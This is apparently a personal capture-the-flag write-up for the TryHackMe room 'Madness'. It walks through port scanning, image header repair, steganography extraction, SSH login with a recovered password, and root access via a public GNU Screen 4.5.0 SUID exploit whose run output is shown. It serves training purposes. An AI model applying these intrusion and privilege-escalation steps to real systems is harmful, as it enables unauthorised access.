TryHackMe: Madness
Madness was indeed a madness, it had me going crazy and made me feel like there was always something missing. Was fun overall and fairly short.
https://tryhackme.com/room/madness
Initial Enumeration
Nmap Scan
We start with our nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T4 -n -sC -sV -Pn -p- 10.10.248.228
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-13 16:36 GMT
Nmap scan report for 10.10.248.228
Host is up (0.059s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ac:f9:85:10:52:65:6e:17:f5:1c:34:e7:d8:64:67:b1 (RSA)
| 256 dd:8e:5a:ec:b1:95:cd:dc:4d:01:b3:fe:5f:4e:12:c1 (ECDSA)
|_ 256 e9:ed:e3:eb:58:77:3b:00:5e:3a:f5:24:d8:58:34:8e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.32 seconds
Web 80
Not much to look at, so we go to port 80:
We see a default apache page, but it had a weird image on the top. And after looking at the source code, we find the following:
We couldn’t find anything else with gobuster so we download the supposed image to our machine to investigate:
1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/Desktop]
└─$ wget http://10.10.248.228/thm.jpg
--2025-02-13 16:40:35-- http://10.10.248.228/thm.jpg
Connecting to 10.10.248.228:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22210 (22K) [image/jpeg]
Saving to: ‘thm.jpg’
thm.jpg 100%[================================================================>] 21.69K --.-KB/s in 0.06s
2025-02-13 16:40:35 (389 KB/s) - ‘thm.jpg’ saved [22210/22210]
Just opening the file, we get an error:
This means that the magic numbers of the file were incorrect, and to check it, we run the xxd command:
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/Desktop]
└─$ xxd thm.jpg | head
00000000: 8950 4e47 0d0a 1a0a 0000 0001 0100 0001 .PNG............
00000010: 0001 0000 ffdb 0043 0003 0202 0302 0203 .......C........
00000020: 0303 0304 0303 0405 0805 0504 0405 0a07 ................
00000030: 0706 080c 0a0c 0c0b 0a0b 0b0d 0e12 100d ................
00000040: 0e11 0e0b 0b10 1610 1113 1415 1515 0c0f ................
00000050: 1718 1614 1812 1415 14ff db00 4301 0304 ............C...
00000060: 0405 0405 0905 0509 140d 0b0d 1414 1414 ................
00000070: 1414 1414 1414 1414 1414 1414 1414 1414 ................
00000080: 1414 1414 1414 1414 1414 1414 1414 1414 ................
00000090: 1414 1414 1414 1414 1414 1414 1414 ffc0 ................
Magic Numbers
With the hexedit tool, we can change the header to be in the correct format:
1
2
3
4
5
JPEG FORMAT:
FF D8 FF E0 00 10 4A 46 49 46 00 01
CURRENT FORMAT(PNG):
89 50 4E 47 0D 0A 1A 0A 00 00 00 01
And after changing it, we get a working image:
It gave us a directory, and going to it, we see the following:
We need to guess a secret, but first we check the source code:
A hint, saying that the secret is between 0 and 99. And the first instinct was to add ?secret= to the url, which worked:
We can use Burp Suite to run through all the numbers and see which one is the secret number:
Now we can navigate to the secret 73 and see the real secret:
Shell as joker
Steganography
There wasn’t much that we had a hold of till now, except what looked like a password and an image. This could mean that something was hidden inside the image, and using steghide we were able to get a text file from the thm.jpg image with the secret as the password:
1
2
3
4
┌──(kali㉿kali)-[~/Desktop]
└─$ steghide extract -sf thm.jpg
Enter passphrase:
wrote extracted data to "hidden.txt".
Inside it had an encoded username:
1
2
3
4
5
6
7
Fine you found the password!
Here's a username
wbxre
I didn't say I would make it easy for you!
We can throw it in CyberChef and using the ROT13 we got the username:
Now we had a username, but we couldn’t log in anywhere, something was missing. And after a long time, with some help, i decided to see if something was hidden inside the image on the task:
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/Desktop]
└─$ stegseek --crack 5iW7kC8.jpeg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "password.txt".
[i] Extracting to "5iW7kC8.jpeg.out".
And it was. Another text file, but now with a password inside:
1
2
3
4
5
I didn't think you'd find me! Congratulations!
Here take my password
*axA&GF8dP
We could finally log into joker’s machine and get the user flag:
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh joker@10.10.248.228
joker@10.10.248.228's password:
joker@ubuntu:~$ ls
user.txt
joker@ubuntu:~$ cat user.txt
THM{REDACTED}
Shell as root
Enumerating joker, we find a weird binary:
1
2
3
4
5
joker@ubuntu:/$ find / -type f -perm -u=s 2>/dev/null
...
/bin/screen-4.5.0
/bin/screen-4.5.0.old
...
And after a quick google search, the first thing we find is an exploit:
We send the exploit to joker’s /tmp folder, give it executable permissions, and run it. We get a root shell and can then read the root flag:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
joker@ubuntu:/tmp$ ./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
...
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
There is a screen on:
18216.pts-0.ubuntu (Attached)
1 Socket in /tmp/screens/S-joker.
# whoami
root
# cat /root/root.txt
THM{REDACTED}
At first script wasn’t working, asked AI for a fix and it gave me this:
sed -i -e 's/\r$//' 41154.sh. What it does essentially is it converts line endings from CRLF, to LF.